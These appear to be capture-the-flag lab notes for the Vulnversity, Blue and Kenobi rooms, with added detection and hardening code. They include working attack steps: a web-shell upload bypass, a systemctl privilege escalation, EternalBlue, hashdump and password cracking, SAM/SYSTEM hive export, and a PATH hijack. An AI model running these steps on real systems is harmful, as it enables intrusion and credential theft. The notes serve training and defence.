# Getting Started
[TOC]
# Vulnversity
## Reconnaissance
>Scan the box, how many ports are open?
```
nmap -sC -sV -A -Pn -T4 10.10.141.180
```
Ans: 6
---
>What version of the squid proxy is running on the machine?

>How many ports will nmap scan if the flag **-p-400** was used?
Ans: 400
---
>Using the nmap flag **-n** what will it not resolve?
Ans: DNS
---
>What is the most likely operating system this machine is running?
Adding the -sV option (service version detection) reveals enough about the running services to infer the OS.
---
> What port is the web server running on?

Knowing every open service matters, since each one is a potential point of exploitation.
Always scan the ports above the default 1000 as well (let that scan run in the background if needed).
## Locating directories using GoBuster
Scan the website to find any hidden directories.
GoBuster can brute-force:
- URIs (directories and files)
- DNS subdomains
- virtual host names
Install the tool:
```
sudo apt-get install gobuster
```
[Gobuster](/vG5G0iawSNC6lcXunlkTwA)
>What is the directory that has an upload form page?
```
gobuster dir -t 20 -u http://10.10.141.180:3333 -w sam-cc-parameters-lowercase-all.txt
```
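The flip side of the gobuster run above is what it looks like in the web server's logs: a single client producing a burst of 404s against wordlist-style paths within seconds. This is an added example (not part of the room or of gobuster) showing a simple detector over Apache/nginx combined-format access logs; the log lines are constructed for the demo and the `gobuster/3.6` user agent is just a sample value.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Combined log format: ip ident user [time] "request" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+(?: "[^"]*" "(?P<ua>[^"]*)")?'
)

def parse_line(line):
    """Parse one combined-format access log line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    rec["status"] = int(rec["status"])
    return rec

def detect_dir_bruteforce(lines, threshold=10, window_seconds=60):
    """Flag clients producing >= threshold 403/404 responses inside any window_seconds span.

    Returns {ip: {"misses": total 403/404 count, "distinct_paths": n, "user_agent": last UA seen}}.
    """
    misses = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec["status"] not in (403, 404):
            continue
        misses[rec["ip"]].append((rec["ts"], rec["path"], rec["ua"]))

    alerts = {}
    for ip, events in misses.items():
        events.sort(key=lambda e: e[0])
        window = deque()                      # timestamps of misses inside the sliding window
        for ts, path, ua in events:
            window.append(ts)
            while (ts - window[0]).total_seconds() > window_seconds:
                window.popleft()
            if len(window) >= threshold:
                alerts[ip] = {
                    "misses": len(events),
                    "distinct_paths": len({p for _, p, _ in events}),
                    "user_agent": ua,
                }
                break
    return alerts

# Constructed sample log: one normal browser session plus a burst of wordlist-style requests.
WORDS = ["admin", "backup", "cgi-bin", "config", "db", "images",
         "internal", "js", "login", "old", "test", "uploads"]
SAMPLE_LOG = [
    '192.168.1.20 - - [10/Mar/2024:12:00:01 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '192.168.1.20 - - [10/Mar/2024:12:00:05 +0000] "GET /missing.png HTTP/1.1" 404 196 "-" "Mozilla/5.0"',
] + [
    f'10.10.14.5 - - [10/Mar/2024:12:01:{i:02d} +0000] "GET /{w} HTTP/1.1" '
    f'{301 if w == "internal" else 404} 178 "-" "gobuster/3.6"'
    for i, w in enumerate(WORDS)
]

if __name__ == "__main__":
    for ip, info in detect_dir_bruteforce(SAMPLE_LOG).items():
        print(f"{ip}: {info['misses']} misses over {info['distinct_paths']} paths, UA={info['user_agent']}")
```

The threshold and window are tuning knobs: a real site has broken links, so count distinct paths and rate rather than raw 404s, and the user agent is only a hint since it is trivially changed.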

## Compromise the webserver
Which extension is allowed? Test what the upload form accepts.

Upload the web shell with a `.phtml` extension.
Trigger the web shell by requesting it under the uploads directory:

http://10.10.141.180:3333/internal/uploads
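The reason `.phtml` gets through is a blocklist filter: it rejects `.php` and nothing else. As an added example (not code from the room or from the target application), here is that weak check next to a hardened upload handler that allowlists extensions, checks every dot-separated suffix, verifies the content's magic bytes against the claimed type, and stores the file under a server-chosen random name. The extension sets and magic bytes are my choices for the demo.

```python
import os
import secrets

# What a naive upload filter typically blocks; the target evidently blocked .php but not .phtml.
NAIVE_BLOCKLIST = {".php"}
# What the hardened handler accepts; everything else is rejected.
ALLOWLIST = {".jpg", ".jpeg", ".png", ".gif", ".pdf"}
# Leading bytes for each allowed type, so the content must agree with the claimed extension.
MAGIC = {
    b"\xff\xd8\xff": ".jpg",
    b"\x89PNG\r\n\x1a\n": ".png",
    b"GIF87a": ".gif",
    b"GIF89a": ".gif",
    b"%PDF-": ".pdf",
}

def naive_blocklist_allows(filename: str) -> bool:
    """The weak check: reject only known-bad extensions. Alternate PHP extensions sail through."""
    return os.path.splitext(filename)[1].lower() not in NAIVE_BLOCKLIST

def allowlist_allows(filename: str) -> bool:
    """The hardened check: every extension in the name must be on the allowlist.

    Looking at all suffixes (not just the last) also rejects names like 'shell.jpg.phtml'
    and 'shell.phtml.jpg', which some handler configurations still pass to the interpreter.
    """
    name = os.path.basename(filename)          # drop any directory components
    parts = name.lower().split(".")
    if len(parts) < 2 or any(p == "" for p in parts):
        return False
    return all("." + p in ALLOWLIST for p in parts[1:])

def sniff_type(data: bytes):
    """Return the extension implied by the file's leading bytes, or None if unrecognised."""
    for magic, ext in MAGIC.items():
        if data.startswith(magic):
            return ext
    return None

def accept_upload(filename: str, data: bytes):
    """Return the name the file would be stored under, or None if it is rejected."""
    if not allowlist_allows(filename):
        return None
    claimed = "." + filename.lower().rsplit(".", 1)[1]
    if claimed == ".jpeg":
        claimed = ".jpg"
    if sniff_type(data) != claimed:
        return None
    # Random server-chosen name: the user-supplied name never reaches the filesystem.
    # The caller should still store it outside the web root or where script execution is disabled.
    return secrets.token_hex(16) + claimed
```

Even with this check, the decisive control is the web server configuration: an uploads directory that the server will never hand to PHP turns a filter bypass into a harmless file.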

---
>What is the name of the user who manages the webserver?
```
grep home /etc/passwd
```

Ans: Bill
>What is the user flag?

---
> Become root and get the last flag (/root/root.txt)
```
TF=$(mktemp).service
echo '[Service]
Type=oneshot
ExecStart=/bin/sh -c "cat /root/root.txt > /tmp/flag"
[Install]
WantedBy=multi-user.target' > $TF
systemctl link $TF
systemctl enable --now $TF
```

# Blue
Deploy & hack into a Windows machine, leveraging common misconfiguration issues.
>How many ports are open with a port number under 1000?
```
nmap -sV -sC -Pn -A -T4 <IP>
```

Ans: 3
>What is this machine vulnerable to? (Answer in the form of: ms??-???, ex: ms08-067)
Ans: ms17-010

## Gain Access
>Find the exploitation code we will run against the machine. What is the full path of the code? (Ex: exploit/........)
Ans: exploit/windows/smb/ms17_010_eternalblue
## Escalate
Escalate privileges, learn how to upgrade shells in metasploit.
>If you haven't already, background the previously gained shell (CTRL + Z). Research online how to convert a shell to meterpreter shell in metasploit. What is the name of the post module we will use? (Exact path, similar to the exploit we previously selected)
---
>List all of the processes running via the 'ps' command. Just because we are system doesn't mean our process is. Find a process towards the bottom of this list that is running at NT AUTHORITY\\SYSTEM and write down the process id (far left column).

---
>Migrate to this process using the 'migrate PROCESS_ID' command where the process id is the one you just wrote down in the previous step. This may take several attempts, migrating processes is not very stable. If this fails, you may need to re-run the conversion process or reboot the machine and start once again. If this happens, try a different process next time.
Current PID: 504 (the shell's own process; pick a different SYSTEM process to migrate into)

```
migrate <PROCESS_ID>
```


## Cracking
>Within our elevated meterpreter shell, run the command 'hashdump'. This will dump all of the passwords on the machine as long as we have the correct privileges to do so. What is the name of the non-default user?

Crack the dumped NT hashes with John the Ripper:
```
john --wordlist=../../wordlists/rockyou.txt crack.txt --format=NT
```

## Find flags!
>Flag1? _This flag can be found at the system root._

>Flag2? _This flag can be found at the location where passwords are stored within Windows._
[reference](https://security.stackexchange.com/questions/63890/does-windows-have-a-built-in-password-store)
### Windows Credentials
Yes, they are stored hashed within files in the `c:\Windows\System32\Config\` directory. You will need the `SAM` and `system` files. However, a backup of these files may be stored in the Windows repair folder at `c:\Windows\Repair\`. `SAM` contains the hashed passwords, however they are encrypted using the boot key within the `system` file.
```
C:\>reg.exe save HKLM\SAM sam
The operation completed successfully
C:\>reg.exe save HKLM\SYSTEM sys
The operation completed successfully
```
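The `reg.exe save HKLM\SAM` / `HKLM\SYSTEM` pair shown above is exactly what a defender should be alerting on in process-creation telemetry (Sysmon Event ID 1 or Windows 4688), because legitimate software almost never exports those hives. This added example (not part of the room) is a small matcher for that command line; the event records are constructed and use a placeholder user and host name.

```python
import re

# Matches "reg[.exe] save|export HKLM\SAM|SYSTEM|SECURITY ...", with or without a quoted
# full path to reg.exe and with HKLM spelled long or short. Case-insensitive, as cmd.exe is.
HIVE_DUMP_RE = re.compile(
    r'^\s*"?(?:[^"\s]*\\)?reg(?:\.exe)?"?\s+(?:save|export)\s+'
    r'"?(?:HKLM|HKEY_LOCAL_MACHINE)\\(?:SAM|SYSTEM|SECURITY)\b',
    re.IGNORECASE,
)

def is_hive_dump(command_line: str) -> bool:
    """True if the command line exports one of the credential-bearing registry hives to a file."""
    return HIVE_DUMP_RE.match(command_line) is not None

def scan_process_events(events):
    """Return the events (dicts with a 'cmdline' key) that look like a SAM/SYSTEM/SECURITY export."""
    return [e for e in events if is_hive_dump(e["cmdline"])]

# Constructed process-creation records in the shape of Sysmon ID 1 / Windows 4688 fields.
SAMPLE_EVENTS = [
    {"ts": "2024-03-10T12:03:10Z", "user": r"NT AUTHORITY\SYSTEM",
     "image": r"C:\Windows\System32\reg.exe", "cmdline": r"reg.exe save HKLM\SAM sam"},
    {"ts": "2024-03-10T12:03:11Z", "user": r"NT AUTHORITY\SYSTEM",
     "image": r"C:\Windows\System32\reg.exe", "cmdline": r"reg.exe save HKLM\SYSTEM sys"},
    {"ts": "2024-03-10T12:05:00Z", "user": r"WORKSTATION\alice",
     "image": r"C:\Windows\System32\reg.exe",
     "cmdline": r"reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"},
    {"ts": "2024-03-10T12:06:30Z", "user": r"WORKSTATION\alice",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'"C:\Windows\System32\reg.exe" export hkey_local_machine\security C:\Users\Public\sec.hiv'},
    {"ts": "2024-03-10T12:07:00Z", "user": r"WORKSTATION\alice",
     "image": r"C:\Windows\System32\reg.exe", "cmdline": r"reg save HKLM\SOFTWARE\Contoso backup.reg"},
]

if __name__ == "__main__":
    for e in scan_process_events(SAMPLE_EVENTS):
        print(f"{e['ts']} {e['user']}: {e['cmdline']}")
```

The same rule belongs next to alerts for reads of `C:\Windows\Repair\SAM` and for volume shadow copy creation, since those are the other common routes to the same two files.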
> flag3? _This flag can be found in an excellent location to loot. After all, Administrators usually have pretty interesting things saved._

# Kenobi
Exploiting a Linux machine
## Recon
>Scan the machine with nmap, how many ports are open?
```
import subprocess

# Command to run (-Pn: skip host discovery, -sC/-sV: default scripts and version detection)
cmd = "nmap -sC -sV -Pn -A -T4 10.10.130.98"
print("script is running. Author:meowhecker")
# Start nmap as a child process and capture both output streams
p = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
# Wait for it to finish and retrieve the result
stdout, stderr = p.communicate()
# Print the output
print(stdout.decode())
print(stderr.decode())
```
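Every room on this page opens with "how many ports are open" (and Blue adds "under 1000"), which is easier to answer from saved output than by counting on screen. As an added example (not the author's script and not part of nmap), here is a parser for nmap's grepable format, which you get by adding `-oG -` to the command above; the scan output below is constructed, with invented services and version strings.

```python
# Constructed nmap "grepable" (-oG) output; ports, services and versions are invented for the demo.
SAMPLE_GNMAP = """\
# Nmap 7.94 scan initiated Sun Mar 10 12:00:00 2024 as: nmap -sV -oG - 10.0.0.5
Host: 10.0.0.5 ()\tStatus: Up
Host: 10.0.0.5 ()\tPorts: 21/open/tcp//ftp//ExampleFTPd 1.0/, 22/open/tcp//ssh//ExampleSSH 2.0/, 80/open/tcp//http//ExampleHTTPd 3.0/, 111/open/tcp//rpcbind//2-4 (RPC #100000)/, 139/open/tcp//netbios-ssn//ExampleSMB 4.0/, 445/open/tcp//netbios-ssn//ExampleSMB 4.0/, 2049/open/tcp//nfs_acl//2-3 (RPC #100227)/, 3333/filtered/tcp//dec-notes///\tIgnored State: closed (992)
# Nmap done at Sun Mar 10 12:00:20 2024 -- 1 IP address (1 host up) scanned in 20.00 seconds
"""

def parse_gnmap(text):
    """Parse -oG output into {ip: [{port, state, proto, service, version}, ...]}.

    Each 'Ports:' entry is port/state/protocol/owner/service/rpc-info/version/.
    """
    hosts = {}
    for line in text.splitlines():
        if not line.startswith("Host:"):
            continue
        fields = line.split("\t")
        ip = fields[0].split()[1]
        hosts.setdefault(ip, [])
        for field in fields[1:]:
            if not field.startswith("Ports:"):
                continue
            for entry in field[len("Ports:"):].strip().split(", "):
                parts = entry.split("/")
                if len(parts) < 7:
                    continue          # malformed entry: skip rather than crash
                port, state, proto, _owner, service, _rpc, version = parts[:7]
                hosts[ip].append({"port": int(port), "state": state, "proto": proto,
                                  "service": service, "version": version})
    return hosts

def open_ports(hosts, ip, below=None):
    """Sorted open ports for ip; with below=N only ports numbered under N (the 'under 1000' question)."""
    return sorted(p["port"] for p in hosts.get(ip, [])
                  if p["state"] == "open" and (below is None or p["port"] < below))

if __name__ == "__main__":
    hosts = parse_gnmap(SAMPLE_GNMAP)
    print("open:", open_ports(hosts, "10.0.0.5"))
    print("open under 1000:", open_ports(hosts, "10.0.0.5", below=1000))
```

Note that the parser keeps filtered and closed entries too, so the same structure answers "what is filtered" or "which service runs on port N" without a second scan.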

## Enumerating Samba
Samba is a free software implementation of the SMB protocol that lets Unix-like systems share files and printers with Windows.

### SMB
- Port 139: NetBIOS session service (Layer 4). It allows Windows machines on the same network to talk to each other.
- Port 445: SMB directly over TCP.
Enumerate the SMB shares and users:
```
nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse 10.10.130.98
```
### Connect to SMB server
Connect to the server as a client (the anonymous share):
```
smbclient //10.10.130.98/anonymous
```
>Once you're connected, list the files on the share. What file can you see?
#### Download the specific file
```
get log.txt
```

### Download the SMB share folder
```
smbget -R smb://<ip>/anonymous
```
>What port is FTP running on?

## RPC remote procedure call
Remote Procedure Call (RPC) is a communication protocol that lets a program call a procedure on another computer as if it were a local call. RPC lets programs on different machines work together as though they were on the same machine. It is commonly used in distributed systems, such as distributed applications and distributed databases.

NFS (Network File System) is an RPC service.
Port 111 (rpcbind) is the entry point for reaching the network file system. Let's use nmap to enumerate it.
```
nmap -p 111 --script=nfs-ls,nfs-statfs,nfs-showmount 10.10.130.98
```

## Gain initial access with ProFtpd
ProFtpd is a free and open-source FTP server.
>Let's get the version of ProFtpd. Use netcat to connect to the machine on the FTP port.
>What is the version?

>How many exploits are there for the ProFTPd running?
Searchsploit is basically just a command line search tool for exploit-db.com.

### Get the kenobi ssh key

Mount the NFS export (/var) locally and look for the key there:
```
mount 10.10.130.98:/var /home/meowhecker/offensivePentesting/Kenobi/nfsShare
```

---

### SSH login
```
chmod 600 id_rsa   # required, otherwise ssh refuses the key because of its permissions
ssh -i id_rsa kenobi@10.10.130.98
# -i identity_file
```

>What is Kenobi's user flag (/home/kenobi/user.txt)?

## Privilege Escalation with Path Variable Manipulation

Find SUID files:
```
find / -perm -u=s -type f -ls 2>/dev/null
```
### Odd binary file (menu)

The menu binary probably runs these commands:
```
curl -I localhost
uname -r
ifconfig
```
```
echo $PATH
export PATH=/tmp:$PATH
```
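What makes the `export PATH=/tmp:$PATH` trick work is a SUID binary calling `curl` by bare name while a world-writable directory sits ahead of `/usr/bin` in the search order. From the hardening side, the check is mechanical: list world-writable directories in PATH and see which commands resolve through or behind them. This added example (not part of the room) does that audit; its `demo()` builds a throwaway directory layout with placeholder scripts so it runs offline, and the "untrusted"/"system" directory names stand in for `/tmp` and `/usr/bin`.

```python
import os
import stat
import tempfile

EXEC_BITS = stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH

def is_world_writable(path):
    """True if 'others' may write to path (the classic /tmp-in-PATH condition)."""
    try:
        return bool(os.stat(path).st_mode & stat.S_IWOTH)
    except OSError:
        return False

def resolve(command, path_dirs):
    """First (directory, file) match along path_dirs, the same left-to-right rule a shell applies."""
    for d in path_dirs:
        candidate = os.path.join(d, command)
        try:
            st = os.stat(candidate)
        except OSError:
            continue
        if stat.S_ISREG(st.st_mode) and st.st_mode & EXEC_BITS:
            return d, candidate
    return None

def audit_path(path_value, commands):
    """Report world-writable PATH entries and, per command, whether its resolution can be hijacked."""
    dirs = [d for d in path_value.split(os.pathsep) if d]
    report = {
        "world_writable_dirs": [d for d in dirs if os.path.isdir(d) and is_world_writable(d)],
        "commands": {},
    }
    for cmd in commands:
        hit = resolve(cmd, dirs)
        if hit is None:
            report["commands"][cmd] = {"resolves_to": None, "risk": "missing"}
            continue
        hit_dir, hit_file = hit
        if is_world_writable(hit_dir):
            risk = "resolves inside a world-writable directory"
        elif any(is_world_writable(d) for d in dirs[:dirs.index(hit_dir)]):
            risk = "a world-writable directory precedes it in PATH"
        else:
            risk = "ok"
        report["commands"][cmd] = {"resolves_to": hit_file, "risk": risk}
    return report

def _write_script(path):
    """Placeholder executable standing in for a real binary (constructed for the demo)."""
    with open(path, "w") as f:
        f.write("#!/bin/sh\necho placeholder\n")
    os.chmod(path, 0o755)

def demo():
    """Throwaway layout: a /tmp-like dir ahead of a 'system' dir; audit the menu binary's commands."""
    with tempfile.TemporaryDirectory() as root:
        untrusted = os.path.join(root, "untrusted")   # plays the role of /tmp
        system = os.path.join(root, "system")         # plays the role of /usr/bin
        os.makedirs(untrusted)
        os.makedirs(system)
        os.chmod(untrusted, 0o1777)    # sticky + world-writable, like /tmp
        os.chmod(system, 0o755)
        _write_script(os.path.join(system, "curl"))
        _write_script(os.path.join(system, "uname"))
        _write_script(os.path.join(untrusted, "curl"))   # a second 'curl' that shadows the system one
        return audit_path(os.pathsep.join([untrusted, system]), ["curl", "uname", "ifconfig"])

if __name__ == "__main__":
    for cmd, info in demo()["commands"].items():
        print(f"{cmd:10} -> {info['resolves_to']}: {info['risk']}")
```

Run it against the real environment with `audit_path(os.environ["PATH"], ["curl", "uname", "ifconfig"])`. The fix on the binary's side is to call commands by absolute path or reset PATH to a fixed value before `system()`; the fix on the system's side is never to let a world-writable directory into a privileged process's PATH.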

---
